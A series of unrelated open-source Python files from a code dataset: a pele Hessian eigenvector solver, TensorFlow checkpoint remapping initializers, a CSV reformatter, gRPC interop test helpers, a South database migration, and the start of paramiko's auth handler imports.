    """Compute the lowest eigenvector of the Hessian by Rayleigh-Ritz minimization

    Parameters
    ----------
    coords : float array
        the point in space at which to compute the lowest eigenvector
    pot : Potential object
        the potential energy function
    eigenvec0 : float array
        initial guess for the lowest eigenvector (random if omitted)
    orthogZeroEigs : callable
        function which makes a vector orthogonal to the known
        zero-eigenvalue eigenvectors.  The default (0) assumes global
        translational and rotational symmetry
    dx : float
        finite-difference separation used to approximate the curvature
    first_order : bool
        use the first order forward finite differences approximation
        (one fewer potential call per iteration, but less accurate than
        central differences)
    gradient : float array
        the true gradient at coords.  Saves one potential call when
        first_order is True
    minimizer_kwargs : kwargs
        passed through to the optimizer that minimizes the curvature
    """
    def __init__(self, coords, pot, eigenvec0=None, orthogZeroEigs=0, dx=1e-6,
                 first_order=True, gradient=None, **minimizer_kwargs):
        self.minimizer_kwargs = minimizer_kwargs

        if eigenvec0 is None:
            # draw the starting direction uniformly from the unit hypersphere
            eigenvec0 = rotations.vec_random_ndim(coords.shape)
            eigenvec0 /= np.linalg.norm(eigenvec0)

        # override some minimizer defaults unless the caller set them
        self.minimizer_kwargs.setdefault("nsteps", 500)
        if "logger" not in self.minimizer_kwargs:
            self.minimizer_kwargs["logger"] = logging.getLogger("pele.connect.findTS.leig_quench")

        self.eigpot = LowestEigPot(coords, pot, orthogZeroEigs=orthogZeroEigs, dx=dx,
                                   gradient=gradient,
                                   first_order=first_order)
        self.minimizer = MYLBFGS(eigenvec0, self.eigpot, rel_energy=True,
                                 **self.minimizer_kwargs)

    def stop_criterion_satisfied(self):
        """return True when the eigenvector optimization has converged"""
        return self.minimizer.stop_criterion_satisfied()

    def update_coords(self, coords, energy=None, gradient=None):
        """change the position at which the eigenvector is computed

        The minimizer is rebuilt from the current best eigenvector and
        restarted with its previous internal state.
        """
        self.eigpot.update_coords(coords, gradient=gradient)
        saved_state = self.minimizer.get_state()
        best_vec = self.get_result().eigenvec
        self.minimizer = MYLBFGS(best_vec, self.eigpot, rel_energy=True,
                                 **self.minimizer_kwargs)
        self.minimizer.set_state(saved_state)

    def one_iteration(self):
        """perform a single iteration of the minimizer"""
        self.minimizer.one_iteration()

    def run(self, niter=None):
        """iterate until convergence, or for at most niter iterations"""
        if niter is None:
            self.minimizer.run()
        else:
            for _ in xrange(niter):
                if self.minimizer.stop_criterion_satisfied():
                    break
                self.one_iteration()
        return self.get_result()

    def get_result(self):
        """return the results object, renaming energy/coords to
        eigenval/eigenvec"""
        res = self.minimizer.get_result()
        res.eigenval = res.energy
        res.eigenvec = res.coords / np.linalg.norm(res.coords)
        delattr(res, "energy")
        delattr(res, "coords")
        res.nfev = self.eigpot.nfev
        return res
def findLowestEigenVector(coords, pot, eigenvec0=None, H0=None, orthogZeroEigs=0, dx=1e-3,
                          first_order=True, gradient=None,
                          **minimizer_kwargs):
    """Compute the lowest eigenvector of the Hessian using Rayleigh-Ritz minimization

    ***orthogZeroEigs is system dependent, don't forget to set it***

    Parameters
    ----------
    coords :
        the coordinates at which to find the lowest eigenvector
    pot :
        potential object
    eigenvec0 :
        initial guess for the lowest eigenvector (random if not passed)
    H0 : float
        initial guess for the diagonal component of the inverse Hessian
    orthogZeroEigs : callable
        makes a vector orthogonal to the known zero eigenvectors:
        orthogZeroEigs=0 : default, assume translational and rotational
        symmetry; orthogZeroEigs=None : leave the vector unchanged
    first_order : bool
        use first order forward finite differences for the curvature
        (one fewer potential call per iteration, but less accurate)
    gradient : float array
        the true gradient at coords; saves one potential call when
        first_order is True
    minimizer_kwargs :
        any additional keyword arguments are passed to the minimizer

    See Also
    --------
    FindTransitionState : uses this class
    """
    # copy so the caller's dict is not mutated by the defaults below
    kwargs = dict(minimizer_kwargs)
    kwargs.setdefault("iprint", 400)
    kwargs.setdefault("tol", 1e-6)

    finder = FindLowestEigenVector(coords, pot, eigenvec0=eigenvec0, H0=H0,
                                   orthogZeroEigs=orthogZeroEigs, dx=dx,
                                   first_order=first_order, gradient=gradient,
                                   **kwargs)
    return finder.run()
def analyticalLowestEigenvalue(coords, pot):
    """Return the lowest eigenvalue and eigenvector of the Hessian computed directly.

    This diagonalizes the full analytical Hessian, so it is only practical
    for small systems; it exists for testing the iterative estimators.

    Parameters
    ----------
    coords :
        the coordinates at which to evaluate the Hessian
    pot :
        potential object providing ``getHessian``
    """
    from pele.utils.hessian import get_sorted_eig
    # Original code had a stray no-op string statement ("for testing")
    # here; its content is folded into the docstring above.
    hess = pot.getHessian(coords)
    vals, vecs = get_sorted_eig(hess)
    return vals[0], vecs[:, 0]
#
#
# only testing function below here
#
#
#
#
# def testpot2():
# from pele.potentials.lj import LJ
# import itertools
# pot = LJ()
# a = 1.12 #2.**(1./6.)
# theta = 20./360*np.pi
# coords = [ 0., 0., 0., \
# -a, 0., 0., \
# a*np.cos(theta), a*np.sin(theta), 0. ]
# c = np.reshape(coords, [3,3])
# for i, j in itertools.combinations(range(3), 2):
# r = np.linalg.norm(c[i,:] - c[j,:])
# print i, j, r
#
# def testpot1():
# from pele.potentials.lj import LJ
# import itertools
# pot = LJ()
# a = 1.12 #2.**(1./6.)
# theta = 60./360*np.pi
# coords = [ 0., 0., 0., \
# -a, 0., 0., \
# -a/2, a*np.cos(theta), 0., \
# -a/2, -a*np.cos(theta), 0.1 \
# ]
# natoms = len(coords)/3
# c = np.reshape(coords, [-1,3])
# for i, j in itertools.combinations(range(natoms), 2):
# r = np.linalg.norm(c[i,:] - c[j,:])
# print i, j, r
#
# e, g = pot.getEnergyGradient(coords)
# print "initial E", e
# print "initial G", g, np.linalg.norm(g)
#
# eigpot = LowestEigPot(coords, pot)
# vec = np.random.rand(len(coords))
# e, g = eigpot.getEnergyGradient(vec)
# print "eigenvalue", e
# print "eigenvector", g
#
# if True:
# e, g, hess = pot.getEnergyGradientHessian(coords)
# print "shape hess", np.shape(hess)
# print "hessian", hess
# u, v = np.linalg.eig(hess)
# print "max imag value", np.max(np.abs(u.imag))
# print "max imag vector", np.max(np.abs(v.imag))
# u = u.real
# v = v.real
# print "eigenvalues", u
# for i in range(len(u)):
# print "eigenvalue", u[i], "eigenvector", v[:,i]
# #find minimum eigenvalue, vector
# imin = 0
# umin = 10.
# for i in range(len(u)):
# if np.abs(u[i]) < 1e-10: continue
# if u[i] < umin:
# umin = u[i]
# imin = i
# print "lowest eigenvalue ", umin, imin
# print "lowest eigenvector", v[:,imin]
#
#
# from pele.optimize import lbfgs_py as quench
# ret = quench(vec, eigpot.getEnergyGradient, iprint=10, tol = 1e-5, maxstep = 1e-3, \
# rel_energy = True)
# print ret
#
# print "lowest eigenvalue "
# print umin, imin
# print "lowest eigenvector"
# print v[:,imin]
# print "now the estimate"
# print ret[1]
# print ret[0]
#
#def testpot3():
# from transition_state_refinement import guesstsLJ
# pot, coords, coords1, coords2 = guesstsLJ()
# coordsinit = np.copy(coords)
#
# eigpot = LowestEigPot(coords, pot)
#
# vec = np.random.rand(len(coords))
#
# from pele.optimize import lbfgs_py as quench
# ret = quench(vec, eigpot.getEnergyGradient, iprint=400, tol = 1e-5, maxstep = 1e-3, \
# rel_energy = True)
#
# eigval = ret[1]
# eigvec = ret[0]
# print "eigenvalue ", eigval
# print "eigenvector", eigvec
#
# if True:
# e, g, hess = pot.getEnergyGradientHessian(coords)
# u, v = np.linalg.eig(hess)
# u = u.real
# v = v.real
# print "eigenvalues", sorted(u)
# #for i in range(len(u)):
# # print "eigenvalue", u[i], "eigenvector", v[:,i]
# #find minimum eigenvalue, vector
# imin = 0
# umin = 10.
# for i in range(len(u)):
# if np.abs(u[i]) < 1e-10: continue
# if u[i] < umin:
# umin = u[i]
# imin = i
# #print "lowest eigenvalue ", umin, imin
# #print "lowest eigenvector", v[:,imin]
#
#
#
# trueval, truevec = u[imin], v[:,imin]
# print "analytical lowest eigenvalue", trueval
# maxdiff = np.max(np.abs(truevec - eigvec))
# print "maximum difference between estimated and analytical eigenvectors", maxdiff, \
# np.linalg.norm(eigvec), np.linalg.norm(truevec), np.dot(truevec, eigvec)
# if True:
# print eigvec
# print truevec
#
#
#
#if __name__ == "__main__":
# #testpot1()
# testpot3()
#
| gpl-3.0 |
tornadozou/tensorflow | tensorflow/contrib/framework/python/ops/checkpoint_ops.py | 76 | 8864 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operations for generating and loading vocab remappings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import init_ops
from tensorflow.python.training import checkpoint_ops
# Re-export the private implementations from
# tensorflow.python.training.checkpoint_ops under this contrib namespace.
# pylint: disable=protected-access,line-too-long
load_and_remap_matrix_initializer = checkpoint_ops._load_and_remap_matrix_initializer
# pylint: enable=line-too-long
load_embedding_initializer = checkpoint_ops._load_embedding_initializer
# pylint: enable=protected-access
def load_linear_multiclass_bias_initializer(ckpt_path,
                                            bias_tensor_name,
                                            new_class_vocab_size,
                                            old_class_vocab_file,
                                            new_class_vocab_file,
                                            num_class_oov_buckets=0,
                                            initializer=None,
                                            max_rows_in_memory=-1):
  """Loads pre-trained multi-class biases for linear models from checkpoint.

  Thin wrapper around `load_and_remap_matrix_initializer()` that treats the
  bias vector as a `[new_class_vocab_size, 1]` matrix whose rows are remapped
  according to the old/new class vocabularies (there is no column vocab).
  See `load_and_remap_matrix_initializer()` for full details.

  Args:
    ckpt_path: Path to the TensorFlow checkpoint (version 2, `TensorBundle`)
      from which the old bias `Tensor` will be loaded.
    bias_tensor_name: Tensor name to load from the checkpoint.
    new_class_vocab_size: Number of entries in the new class vocab.
    old_class_vocab_file: A scalar `Tensor` of type `string` containing the
      path to the old class vocabulary file.
    new_class_vocab_file: A scalar `Tensor` of type `string` containing the
      path to the new class vocabulary file.
    num_class_oov_buckets: `int` number of out-of-vocabulary buckets for the
      classes. Must be >= 0.
    initializer: Initializer function accepting a 1-D shape tensor. Defaults
      to `zeros_initializer()` when `None`.
    max_rows_in_memory: `int` maximum number of rows to load from the
      checkpoint at once; <= 0 loads the entire matrix into memory.

  Returns:
    A variable initializer function.
  """
  # Linear multi-class biases should be zero-initialized.
  if initializer is None:
    initializer = init_ops.zeros_initializer()

  remap_kwargs = dict(
      ckpt_path=ckpt_path,
      old_tensor_name=bias_tensor_name,
      new_row_vocab_size=new_class_vocab_size,
      new_col_vocab_size=1,
      old_row_vocab_file=old_class_vocab_file,
      new_row_vocab_file=new_class_vocab_file,
      old_col_vocab_file=None,
      new_col_vocab_file=None,
      num_row_oov_buckets=num_class_oov_buckets,
      num_col_oov_buckets=0,
      initializer=initializer,
      max_rows_in_memory=max_rows_in_memory)
  return load_and_remap_matrix_initializer(**remap_kwargs)
def load_variable_slot_initializer(ckpt_path,
                                   old_tensor_name,
                                   primary_partition_info,
                                   new_row_vocab_size,
                                   new_col_vocab_size,
                                   old_row_vocab_file=None,
                                   new_row_vocab_file=None,
                                   old_col_vocab_file=None,
                                   new_col_vocab_file=None,
                                   num_row_oov_buckets=0,
                                   num_col_oov_buckets=0,
                                   initializer=None,
                                   max_rows_in_memory=-1):
  """Loads pre-trained multi-class slots for linear models from checkpoint.

  Wrapper around `load_and_remap_matrix_initializer()` specialized for
  multi-class slots (such as optimizer accumulators), remapping them
  according to the provided vocab files; see that function for details on
  each remapping argument. Takes a `variable_scope._PartitionInfo`
  describing the slot's primary `Variable`'s partitioning, because
  accumulator `Variable` creation ignores primary scoping and partitioning
  information.

  Args:
    ckpt_path: Path to the TensorFlow checkpoint (version 2, `TensorBundle`)
      from which the old matrix `Tensor` will be loaded.
    old_tensor_name: Name of the 2-D `Tensor` to load from checkpoint.
    primary_partition_info: A `variable_scope._PartitionInfo` containing the
      primary `Variable`'s partitioning information, used to override the
      partition_info passed at initialization time.
    new_row_vocab_size: `int` number of entries in `new_row_vocab_file` (or,
      with no row remapping, the number of rows to load from the old matrix).
    new_col_vocab_size: `int` number of entries in `new_col_vocab_file` (or,
      with no column remapping, the number of columns in the old matrix).
    old_row_vocab_file: Scalar string `Tensor` path to the old row vocab
      file, or None for no row remapping.
    new_row_vocab_file: Scalar string `Tensor` path to the new row vocab
      file, or None for no row remapping.
    old_col_vocab_file: Scalar string `Tensor` path to the old column vocab
      file, or None for no column remapping.
    new_col_vocab_file: Scalar string `Tensor` path to the new column vocab
      file, or None for no column remapping.
    num_row_oov_buckets: `int` >= 0 out-of-vocabulary rows to append.
    num_col_oov_buckets: `int` >= 0 out-of-vocabulary columns to append.
    initializer: Initializer function for missing values, accepting a 1-D
      shape tensor. Defaults to `zeros_initializer()` when `None`.
    max_rows_in_memory: `int` maximum number of rows to load from the
      checkpoint at once; <= 0 loads the entire matrix into memory.

  Returns:
    A variable initializer function for a (potentially partitioned)
    `Variable` of complete shape `[new_row_vocab_size + num_row_oov_buckets,
    new_col_vocab_size + num_col_oov_buckets]`.

  Raises:
    TypeError: If `initializer` is specified but not callable.
  """
  initializer_fn = load_and_remap_matrix_initializer(
      ckpt_path=ckpt_path,
      old_tensor_name=old_tensor_name,
      new_row_vocab_size=new_row_vocab_size,
      new_col_vocab_size=new_col_vocab_size,
      old_row_vocab_file=old_row_vocab_file,
      new_row_vocab_file=new_row_vocab_file,
      old_col_vocab_file=old_col_vocab_file,
      new_col_vocab_file=new_col_vocab_file,
      num_row_oov_buckets=num_row_oov_buckets,
      num_col_oov_buckets=num_col_oov_buckets,
      initializer=initializer,
      max_rows_in_memory=max_rows_in_memory)

  def _initializer(shape, dtype=dtypes.float32, partition_info=None):
    # Slot variables are created without the primary's partitioning info,
    # so the partition_info supplied here is discarded in favor of the
    # primary's.
    del partition_info
    return initializer_fn(shape, dtype, partition_info=primary_partition_info)

  return _initializer
| apache-2.0 |
skihyy/GT-Spring-2017-CS6262 | decision_tree/reformater.py | 1 | 1607 | import csv
"""
with open('combined.csv', 'rb') as r:
with open('reformatted.csv', 'wb') as w:
data = csv.reader(r, delimiter=',')
for line in data:
length = len(line)
for i in range(0, length):
if 'FALSE' == line[i]:
line[i] = 0
elif 'TRUE' == line[i]:
line[i] = 1
writer = csv.writer(w)
writer.writerows(data)
w.close()
r.close()
with open("new-data-set.csv", 'rb') as r:
with open("new-data-set-refined.csv", 'wb') as w:
data = []
for line in csv.reader(r):
for i in range(len(line)):
if 0 == len(line[i].strip()):
line[i] = '0'
data.append(line)
writer = csv.writer(w)
writer.writerows(data)
w.close()
r.close()
with open("new-data-set.csv", 'rb') as r:
for line in csv.reader(r):
print(line)
r.close()
with open("final_bad.csv", 'rb') as r1:
with open("final_good.csv", 'rb') as r2:
with open("final-data.csv", 'wb') as w:
data = []
for line in csv.reader(r1):
data.append(line)
for line in csv.reader(r2):
data.append(line)
writer = csv.writer(w)
writer.writerows(data)
w.close()
r2.close()
r1.close()
with open("result.csv", 'a+') as w:
writer = csv.writer(w)
writer.writerow(
[0, 1, 2, 3, 4])
w.close()"""
# Quick sanity check: dump every row of the final data set to stdout.
# NOTE: the file is opened in binary mode ('rb'), the Python 2 convention
# for the csv module; under Python 3 this would need mode 'r', newline=''.
with open("final-data-new.csv", 'rb') as r:
    for line in csv.reader(r):
        print(line)
# The redundant r.close() that followed the `with` block was removed: the
# context manager already guarantees the file is closed on exit.
| mit |
rjshade/grpc | src/python/grpcio_tests/tests/interop/resources.py | 23 | 2413 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Constants and functions for data used in interoperability testing."""
import argparse
import os
import pkg_resources
# Package-relative paths of the test credentials bundled with the interop
# tests; these are resolved via pkg_resources in the loaders below.
_ROOT_CERTIFICATES_RESOURCE_PATH = 'credentials/ca.pem'
_PRIVATE_KEY_RESOURCE_PATH = 'credentials/server1.key'
_CERTIFICATE_CHAIN_RESOURCE_PATH = 'credentials/server1.pem'
def test_root_certificates():
    """Return the bundled test CA certificate bundle as bytes."""
    resource_path = _ROOT_CERTIFICATES_RESOURCE_PATH
    return pkg_resources.resource_string(__name__, resource_path)
def private_key():
    """Return the bundled test server private key as bytes."""
    resource_path = _PRIVATE_KEY_RESOURCE_PATH
    return pkg_resources.resource_string(__name__, resource_path)
def certificate_chain():
    """Return the bundled test server certificate chain as bytes."""
    resource_path = _CERTIFICATE_CHAIN_RESOURCE_PATH
    return pkg_resources.resource_string(__name__, resource_path)
def parse_bool(value):
    """argparse type function mapping exactly 'true'/'false' to a bool.

    Any other string raises argparse.ArgumentTypeError.
    """
    mapping = {'true': True, 'false': False}
    try:
        return mapping[value]
    except KeyError:
        raise argparse.ArgumentTypeError('Only true/false allowed')
| bsd-3-clause |
hybrid1969/eve-wspace | evewspace/account/migrations/0004_auto__add_ewsuser__chg_field_userprofile_user.py | 6 | 11121 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """Rename Django's stock ``auth_user`` tables to the custom EWSUser model.

    South schema migration that moves ``auth.User`` data into
    ``account.EWSUser`` by renaming the underlying tables and join columns
    and repointing the ``ContentType`` row, so existing rows are preserved.
    """

    def forwards(self, orm):
        # Rename the auth_user tables (and the m2m join-table FK columns)
        # to their account_ewsuser equivalents.
        db.rename_table('auth_user', 'account_ewsuser')
        db.rename_table('auth_user_groups', 'account_ewsuser_groups')
        db.rename_table('auth_user_user_permissions', 'account_ewsuser_user_permissions')
        db.rename_column('account_ewsuser_user_permissions', 'user_id', 'ewsuser_id')
        db.rename_column('account_ewsuser_groups', 'user_id', 'ewsuser_id')

        # Changing field 'UserProfile.user'
        db.alter_column(u'account_userprofile', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['account.EWSUser'], unique=True))
        # Repoint the ContentType entry so generic relations and permissions
        # keep resolving to the renamed model (skipped on --dry-run where the
        # ORM is unavailable).
        if not db.dry_run:
            orm['contenttypes.contenttype'].objects.filter(app_label='auth',
                model='user').update(app_label='account', model='ewsuser')

    def backwards(self, orm):
        # Exact inverse of forwards(): restore the original auth_user
        # table and column names.
        db.rename_table('account_ewsuser', 'auth_user')
        db.rename_table('account_ewsuser_groups', 'auth_user_groups')
        db.rename_table('account_ewsuser_user_permissions', 'auth_user_user_permissions')
        db.rename_column('auth_user_groups', 'ewsuser_id', 'user_id')
        db.rename_column('auth_user_user_permissions', 'ewsuser_id', 'user_id')

        # Changing field 'UserProfile.user'
        db.alter_column(u'account_userprofile', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], unique=True))
        # Restore the ContentType row to the stock auth.User entry.
        if not db.dry_run:
            orm['contenttypes.contenttype'].objects.filter(app_label='account',
                model='ewsuser').update(app_label='auth', model='user')

    # South "frozen ORM": an auto-generated snapshot of the model definitions
    # at the time this migration was created.  Do not edit by hand.
    models = {
        u'Map.map': {
            'Meta': {'object_name': 'Map'},
            'explicitperms': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
            'root': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'root'", 'to': u"orm['Map.System']"})
        },
        u'Map.system': {
            'Meta': {'object_name': 'System', '_ormbases': [u'core.SystemData']},
            'first_visited': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'importance': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'info': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'last_visited': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'lastscanned': ('django.db.models.fields.DateTimeField', [], {}),
            'npckills': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'occupied': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'podkills': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'shipkills': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'sysclass': ('django.db.models.fields.IntegerField', [], {}),
            u'systemdata_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.SystemData']", 'unique': 'True', 'primary_key': 'True'}),
            'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
        },
        u'account.ewsuser': {
            'Meta': {'object_name': 'EWSUser'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        u'account.groupprofile': {
            'Meta': {'object_name': 'GroupProfile'},
            'description': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'group': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': u"orm['auth.Group']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'regcode': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
            'visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
        },
        u'account.playtime': {
            'Meta': {'object_name': 'PlayTime'},
            'fromtime': ('django.db.models.fields.TimeField', [], {}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'totime': ('django.db.models.fields.TimeField', [], {})
        },
        u'account.userprofile': {
            'Meta': {'object_name': 'UserProfile'},
            'currentsystem': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'activepilots'", 'null': 'True', 'to': u"orm['Map.System']"}),
            'defaultmap': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'defaultusers'", 'null': 'True', 'to': u"orm['Map.Map']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'jabberid': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
            'lastactive': ('django.db.models.fields.DateTimeField', [], {}),
            'playtimes': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['account.PlayTime']", 'symmetrical': 'False'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['account.EWSUser']", 'unique': 'True'})
        },
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'core.constellation': {
            'Meta': {'object_name': 'Constellation', 'db_table': "'mapConstellations'", 'managed': 'False'},
            'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "'constellationID'"}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_column': "'constellationName'"}),
            'region': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'constellations'", 'db_column': "'regionID'", 'to': u"orm['core.Region']"}),
            'x': ('django.db.models.fields.FloatField', [], {}),
            'y': ('django.db.models.fields.FloatField', [], {}),
            'z': ('django.db.models.fields.FloatField', [], {})
        },
        u'core.region': {
            'Meta': {'object_name': 'Region', 'db_table': "'mapRegions'", 'managed': 'False'},
            'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "'regionID'"}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_column': "'regionName'"}),
            'x': ('django.db.models.fields.FloatField', [], {}),
            'y': ('django.db.models.fields.FloatField', [], {}),
            'z': ('django.db.models.fields.FloatField', [], {})
        },
        u'core.systemdata': {
            'Meta': {'object_name': 'SystemData', 'db_table': "'mapSolarSystems'", 'managed': 'False'},
            'constellation': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'systems'", 'db_column': "'constellationID'", 'to': u"orm['core.Constellation']"}),
            'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "'solarSystemID'"}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_column': "'solarSystemName'"}),
            'region': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'systems'", 'db_column': "'regionID'", 'to': u"orm['core.Region']"}),
            'security': ('django.db.models.fields.FloatField', [], {}),
            'x': ('django.db.models.fields.FloatField', [], {}),
            'y': ('django.db.models.fields.FloatField', [], {}),
            'z': ('django.db.models.fields.FloatField', [], {})
        }
    }
    complete_apps = ['account']
| apache-2.0 |
shyamalschandra/picochess | libs/paramiko/auth_handler.py | 8 | 16836 | # Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
`.AuthHandler`
"""
import weakref
from paramiko.common import cMSG_SERVICE_REQUEST, cMSG_DISCONNECT, \
DISCONNECT_SERVICE_NOT_AVAILABLE, DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE, \
cMSG_USERAUTH_REQUEST, cMSG_SERVICE_ACCEPT, DEBUG, AUTH_SUCCESSFUL, INFO, \
cMSG_USERAUTH_SUCCESS, cMSG_USERAUTH_FAILURE, AUTH_PARTIALLY_SUCCESSFUL, \
cMSG_USERAUTH_INFO_REQUEST, WARNING, AUTH_FAILED, cMSG_USERAUTH_PK_OK, \
cMSG_USERAUTH_INFO_RESPONSE, MSG_SERVICE_REQUEST, MSG_SERVICE_ACCEPT, \
